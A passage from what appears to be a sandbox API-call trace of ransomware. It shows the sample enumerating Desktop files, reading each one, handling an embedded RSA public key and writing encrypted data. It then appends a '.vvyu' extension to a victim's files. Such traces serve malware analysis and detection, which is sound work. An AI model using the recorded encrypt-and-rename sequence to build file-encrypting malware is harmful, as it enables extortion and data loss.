hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0184.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0184.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31138 | out: hHeap=0x6a0000) returned 1 [0184.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.004] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17ca1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17ca1, lpOverlapped=0x0) returned 1 [0184.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.006] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17ca6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.006] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.007] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.008] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.008] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.008] CloseHandle (hObject=0x584) returned 1 [0184.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.010] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\o5GqCe9ZgNw7JzfwVH.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\o5gqce9zgnw7jzfwvh.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\o5GqCe9ZgNw7JzfwVH.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\o5gqce9zgnw7jzfwvh.gif.vvyu")) returned 1 [0184.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.013] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.016] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OhY9bMSmLfI5", cAlternateFileName="OHY9BM~1")) returned 1 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0184.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0184.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0184.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0184.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0184.018] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74028ef0, ftCreationTime.dwHighDateTime=0x1d8a067, ftLastAccessTime.dwLowDateTime=0x2c712500, ftLastAccessTime.dwHighDateTime=0x1d8a1fd, ftLastWriteTime.dwLowDateTime=0x2c712500, ftLastWriteTime.dwHighDateTime=0x1d8a1fd, nFileSizeHigh=0x0, nFileSizeLow=0x815a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qC9h.jpg", cAlternateFileName="")) returned 1 [0184.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31138 [0184.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31138 | out: hHeap=0x6a0000) returned 1 [0184.019] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\qC9h.jpg") returned=".jpg" [0184.019] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\qC9h.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\qc9h.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.019] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=33114) returned 1 [0184.019] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.022] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8134, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.022] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.023] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.023] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x815a, lpOverlapped=0x0) returned 1 [0184.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.023] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.024] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.024] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.024] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.024] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.024] GetLastError () returned 0x0 [0184.025] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.025] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.025] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.025] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.025] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8160) returned 0x2d43778 [0184.025] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31138 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31180 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.026] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e870 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.029] GetCurrentThreadId () returned 0x264 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cea40 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.030] GetCurrentThreadId () returned 0x264 [0184.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: 